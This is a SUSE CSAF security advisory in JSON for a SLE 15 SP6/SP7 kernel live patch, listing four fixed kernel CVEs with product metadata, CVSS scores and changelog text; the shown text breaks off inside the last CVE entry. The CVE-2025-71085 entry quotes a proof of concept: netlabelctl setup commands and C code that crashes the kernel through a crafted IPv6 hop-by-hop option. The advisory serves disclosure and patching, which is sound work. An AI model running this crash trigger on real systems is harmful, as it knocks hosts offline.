| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
References
24 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel (Live Patch 8 for SUSE Linux Enterprise 15 SP7)",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThis update for the SUSE Linux Enterprise Kernel 6.4.0-150700.53.28 fixes various security issues\n\nThe following security issues were fixed:\n\n- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).\n- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1102,SUSE-SLE-Module-Live-Patching-15-SP6-2026-1102,SUSE-SLE-Module-Live-Patching-15-SP7-2026-1106",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1102-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1102-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261102-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1102-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/025010.html"
},
{
"category": "self",
"summary": "SUSE Bug 1255378",
"url": "https://bugzilla.suse.com/1255378"
},
{
"category": "self",
"summary": "SUSE Bug 1255402",
"url": "https://bugzilla.suse.com/1255402"
},
{
"category": "self",
"summary": "SUSE Bug 1256624",
"url": "https://bugzilla.suse.com/1256624"
},
{
"category": "self",
"summary": "SUSE Bug 1256644",
"url": "https://bugzilla.suse.com/1256644"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68285 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68285/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
}
],
"title": "Security update for the Linux Kernel (Live Patch 8 for SUSE Linux Enterprise 15 SP7)",
"tracking": {
"current_release_date": "2026-03-27T08:05:21Z",
"generator": {
"date": "2026-03-27T08:05:21Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1102-1",
"initial_release_date": "2026-03-27T08:05:21Z",
"revision_history": [
{
"date": "2026-03-27T08:05:21Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le",
"product_id": "kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le",
"product": {
"name": "kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le",
"product_id": "kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x",
"product_id": "kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x",
"product": {
"name": "kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x",
"product_id": "kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64",
"product_id": "kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64",
"product": {
"name": "kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64",
"product_id": "kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 15 SP6",
"product": {
"name": "SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-live-patching:15:sp6"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-live-patching:15:sp7"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le"
},
"product_reference": "kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x"
},
"product_reference": "kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64"
},
"product_reference": "kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-68284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds writes in handle_auth_session_key()\n\nThe len field originates from untrusted network packets. Boundary\nchecks have been added to prevent potential out-of-bounds writes when\ndecrypting the connection secret or processing service tickets.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68284",
"url": "https://www.suse.com/security/cve/CVE-2025-68284"
},
{
"category": "external",
"summary": "SUSE Bug 1255377 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255377"
},
{
"category": "external",
"summary": "SUSE Bug 1255378 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255378"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T08:05:21Z",
"details": "important"
}
],
"title": "CVE-2025-68284"
},
{
"cve": "CVE-2025-68285",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68285"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix potential use-after-free in have_mon_and_osd_map()\n\nThe wait loop in __ceph_open_session() can race with the client\nreceiving a new monmap or osdmap shortly after the initial map is\nreceived. Both ceph_monc_handle_map() and handle_one_map() install\na new map immediately after freeing the old one\n\n kfree(monc-\u003emonmap);\n monc-\u003emonmap = monmap;\n\n ceph_osdmap_destroy(osdc-\u003eosdmap);\n osdc-\u003eosdmap = newmap;\n\nunder client-\u003emonc.mutex and client-\u003eosdc.lock respectively, but\nbecause neither is taken in have_mon_and_osd_map() it\u0027s possible for\nclient-\u003emonc.monmap-\u003eepoch and client-\u003eosdc.osdmap-\u003eepoch arms in\n\n client-\u003emonc.monmap \u0026\u0026 client-\u003emonc.monmap-\u003eepoch \u0026\u0026\n client-\u003eosdc.osdmap \u0026\u0026 client-\u003eosdc.osdmap-\u003eepoch;\n\ncondition to dereference an already freed map. This happens to be\nreproducible with generic/395 and generic/397 with KASAN enabled:\n\n BUG: KASAN: slab-use-after-free in have_mon_and_osd_map+0x56/0x70\n Read of size 4 at addr ffff88811012d810 by task mount.ceph/13305\n CPU: 2 UID: 0 PID: 13305 Comm: mount.ceph Not tainted 6.14.0-rc2-build2+ #1266\n ...\n Call Trace:\n \u003cTASK\u003e\n have_mon_and_osd_map+0x56/0x70\n ceph_open_session+0x182/0x290\n ceph_get_tree+0x333/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\n Allocated by task 13305:\n ceph_osdmap_alloc+0x16/0x130\n ceph_osdc_init+0x27a/0x4c0\n ceph_create_client+0x153/0x190\n create_fs_client+0x50/0x2a0\n ceph_get_tree+0xff/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n Freed by task 9475:\n kfree+0x212/0x290\n handle_one_map+0x23c/0x3b0\n ceph_osdc_handle_map+0x3c9/0x590\n mon_dispatch+0x655/0x6f0\n ceph_con_process_message+0xc3/0xe0\n ceph_con_v1_try_read+0x614/0x760\n ceph_con_workfn+0x2de/0x650\n process_one_work+0x486/0x7c0\n process_scheduled_works+0x73/0x90\n worker_thread+0x1c8/0x2a0\n kthread+0x2ec/0x300\n ret_from_fork+0x24/0x40\n ret_from_fork_asm+0x1a/0x30\n\nRewrite the wait loop to check the above condition directly with\nclient-\u003emonc.mutex and client-\u003eosdc.lock taken as appropriate. While\nat it, improve the timeout handling (previously mount_timeout could be\nexceeded in case wait_event_interruptible_timeout() slept more than\nonce) and access client-\u003eauth_err under client-\u003emonc.mutex to match\nhow it\u0027s set in finish_auth().\n\nmonmap_show() and osdmap_show() now take the respective lock before\naccessing the map as well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68285",
"url": "https://www.suse.com/security/cve/CVE-2025-68285"
},
{
"category": "external",
"summary": "SUSE Bug 1255401 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "external",
"summary": "SUSE Bug 1255402 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255402"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T08:05:21Z",
"details": "important"
}
],
"title": "CVE-2025-68285"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T08:05:21Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
